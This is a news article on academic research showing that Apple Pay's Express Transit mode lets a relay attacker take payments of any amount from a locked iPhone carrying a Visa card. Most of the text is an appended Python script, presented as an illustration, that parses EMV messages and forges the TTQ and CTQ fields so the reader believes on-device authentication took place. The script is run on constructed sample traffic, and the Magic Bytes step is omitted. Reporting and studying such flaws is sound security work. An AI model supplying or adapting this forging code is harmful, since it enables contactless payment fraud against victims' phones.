The gist: researchers at the University of Birmingham and the University of Surrey have shown that criminals could make fraudulent purchases by bypassing the Apple Pay lock screen of an iPhone. They could also bypass the contactless payment limit.
Normally, to pay with a smartphone wallet app, the user has to authenticate the transaction, for example with a fingerprint, Face ID or the device PIN, which reduces the risk of fraud. To "facilitate payment at transport ticketing barrier stations", Apple introduced the Express Transit / Travel feature in 2019, which lets Apple Pay be used without unlocking the phone.
"We show that this feature can be exploited to bypass the Apple Pay lock screen, and pay illicitly from a locked iPhone, using a Visa card, to any EMV reader, for any amount, without the user's permission," the researchers write in their paper.
“The attack works”
For the attack to work, the iPhone must have a Visa card set up as its Express Travel card. The attacker needs to be close to the victim's phone, but the phone can stay locked in the victim's bag or pocket. "The attack works by first replaying the Magic Bytes to the iPhone, so that it believes the transaction is taking place with a transport EMV reader. Then, when transmitting the EMV messages, the Terminal Transaction Qualifiers (TTQ), sent by the EMV terminal, must be changed so that the bits for offline data authentication (ODA), online authorizations and EMV mode are enabled," the researchers explain.
The contactless payment limit can also be bypassed, by modifying the Card Transaction Qualifiers (CTQ). "This is to trick the EMV reader into believing that user authentication on the device has been performed (for example, by fingerprint). The CTQ value appears in two messages sent by the iPhone and must be modified in both occurrences." In their test, the researchers used this to make a transaction of £1,000 (about €1,180) from a locked iPhone.
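The following Python is an added illustration of the two field manipulations described above, as a relay device sitting between the shop's EMV reader and the iPhone would perform them; it is not code from the researchers, Apple or Visa. It assumes the publicly documented Visa qVSDC layout for the Terminal Transaction Qualifiers (tag 9F66, 4 bytes) and Card Transaction Qualifiers (tag 9F6C, 2 bytes), maps the article's three TTQ items to the "EMV mode supported", "ODA for online authorizations supported" and "online cryptogram required" bits, and uses constructed APDU payloads rather than captured traffic. The Magic Bytes step is deliberately not reproduced.

```python
"""TTQ / CTQ manipulation from the article, on constructed EMV data.

Added example, not from the researchers' paper or tooling. Bit positions follow
the publicly documented Visa qVSDC layout (assumption: verify against the
specification). All payloads below are constructed for this example.
"""

# TTQ bits the relay sets in the terminal -> iPhone direction (assumed layout).
TTQ_B1_EMV_MODE_SUPPORTED = 0x20          # byte 1, bit 6: qVSDC (EMV mode) supported
TTQ_B1_ODA_FOR_ONLINE_AUTH = 0x01         # byte 1, bit 1: ODA for online authorizations
TTQ_B2_ONLINE_CRYPTOGRAM_REQUIRED = 0x80  # byte 2, bit 8: online authorization
# CTQ bit the relay sets in the iPhone -> terminal direction (assumed layout).
CTQ_B2_CDCVM_PERFORMED = 0x80             # byte 2, bit 8: consumer device CVM performed

TAG_TTQ, TAG_CTQ = 0x9F66, 0x9F6C


def _read_tag(buf: bytes, i: int):
    """BER-TLV tag: one byte, or more while the low five bits are all set."""
    tag, i = buf[i], i + 1
    if tag & 0x1F == 0x1F:
        while True:
            tag, i = (tag << 8) | buf[i], i + 1
            if not buf[i - 1] & 0x80:
                break
    return tag, i


def _read_len(buf: bytes, i: int):
    """BER-TLV length: short form, or 0x8N followed by N length bytes."""
    n, i = buf[i], i + 1
    if n & 0x80:
        k = n & 0x7F
        n, i = int.from_bytes(buf[i:i + k], "big"), i + k
    return n, i


def parse_tlv(buf: bytes) -> list:
    """Parse BER-TLV into [(tag, value)]; constructed tags hold nested lists."""
    out, i = [], 0
    while i < len(buf):
        tag, i = _read_tag(buf, i)
        n, i = _read_len(buf, i)
        value, i = buf[i:i + n], i + n
        first = tag >> (8 * ((tag.bit_length() - 1) // 8))  # first tag byte
        out.append((tag, parse_tlv(value) if first & 0x20 else value))
    return out


def encode_tlv(tlv: list) -> bytes:
    """Inverse of parse_tlv."""
    out = bytearray()
    for tag, value in tlv:
        body = encode_tlv(value) if isinstance(value, list) else value
        out += tag.to_bytes((tag.bit_length() + 7) // 8, "big")
        if len(body) < 0x80:
            out.append(len(body))
        else:
            lb = len(body).to_bytes((len(body).bit_length() + 7) // 8, "big")
            out.append(0x80 | len(lb))
            out += lb
        out += body
    return bytes(out)


def rewrite_tag(tlv: list, tag: int, fn) -> list:
    """Apply fn to every occurrence of `tag`, at any nesting depth."""
    return [(t, rewrite_tag(v, tag, fn) if isinstance(v, list)
             else fn(v) if t == tag else v) for t, v in tlv]


def find_all(tlv: list, tag: int) -> list:
    hits = []
    for t, v in tlv:
        if isinstance(v, list):
            hits += find_all(v, tag)
        elif t == tag:
            hits.append(v)
    return hits


def forge_ttq(ttq: bytes) -> bytes:
    """Relay, terminal -> iPhone: enable the ODA, online-authorization and EMV-mode bits."""
    if len(ttq) != 4:
        raise ValueError("TTQ must be 4 bytes")
    b = bytearray(ttq)
    b[0] |= TTQ_B1_EMV_MODE_SUPPORTED | TTQ_B1_ODA_FOR_ONLINE_AUTH
    b[1] |= TTQ_B2_ONLINE_CRYPTOGRAM_REQUIRED
    return bytes(b)


def forge_ctq(ctq: bytes) -> bytes:
    """Relay, iPhone -> terminal: claim on-device CVM (e.g. fingerprint) was performed."""
    if len(ctq) != 2:
        raise ValueError("CTQ must be 2 bytes")
    b = bytearray(ctq)
    b[1] |= CTQ_B2_CDCVM_PERFORMED
    return bytes(b)


def forge_card_response(resp: bytes) -> bytes:
    """Rewrite every CTQ in a card response (the article notes it appears in two messages)."""
    return encode_tlv(rewrite_tag(parse_tlv(resp), TAG_CTQ, forge_ctq))


def ctq_claims_cdcvm(resp: bytes) -> bool:
    """What the EMV reader concludes from the CTQ it receives."""
    return any(v[1] & CTQ_B2_CDCVM_PERFORMED for v in find_all(parse_tlv(resp), TAG_CTQ))


# Constructed sample traffic (not a capture): a shop reader's TTQ with the three
# bits clear, and two iPhone responses whose CTQ says no CDCVM happened, a GPO
# response (template 77) and a READ RECORD response (template 70).
SHOP_TTQ = bytes.fromhex("86004000")
GPO_RESPONSE = bytes.fromhex("771D" "82022000" "9F3602002A" "9F26080102030405060708"
                             "9F270180" "9F6C020000")
RECORD_RESPONSE = bytes.fromhex("7009" "5F340101" "9F6C020000")

if __name__ == "__main__":
    print("TTQ", SHOP_TTQ.hex(), "->", forge_ttq(SHOP_TTQ).hex())
    for msg in (GPO_RESPONSE, RECORD_RESPONSE):
        forged = forge_card_response(msg)
        print(msg.hex(), ctq_claims_cdcvm(msg), "->", forged.hex(), ctq_claims_cdcvm(forged))
```

The point the example makes is the one the article makes: the reader decides whether the limit applies from a two-byte field it receives over the air, so anything that can rewrite the iPhone's responses in transit can set the "CDCVM performed" bit in every occurrence and the reader has no independent way to tell. Only the CTQ values change; all other tags, lengths and ordering survive the rewrite.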